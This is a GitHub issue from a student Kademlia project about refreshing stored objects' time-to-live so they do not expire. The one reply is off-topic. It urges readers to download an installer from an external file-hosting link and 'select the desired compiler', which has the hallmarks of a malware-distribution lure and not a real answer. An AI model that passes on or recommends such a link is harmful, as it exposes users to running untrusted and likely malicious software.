### ISSUE TITLE
Object expiration delay

### ISSUE THREAD

**Issue by Kyrne** [maxluetkemeyer/kadlab#10]
To prevent files from expiring, the node that originally uploaded each object sends a refresh command to the nodes having copies of it to prevent them from being deleted. In particular, the command resets the TTL for the refreshed data object without actually requesting it. As long as the uploading node can contact the storing nodes, the object in question should never expire. 

Blocked  by #9

**Comment by JoelMoraes77** [comment]
try this
https://gofile.io/d/Lji8KD
select the desired compiler in the installer
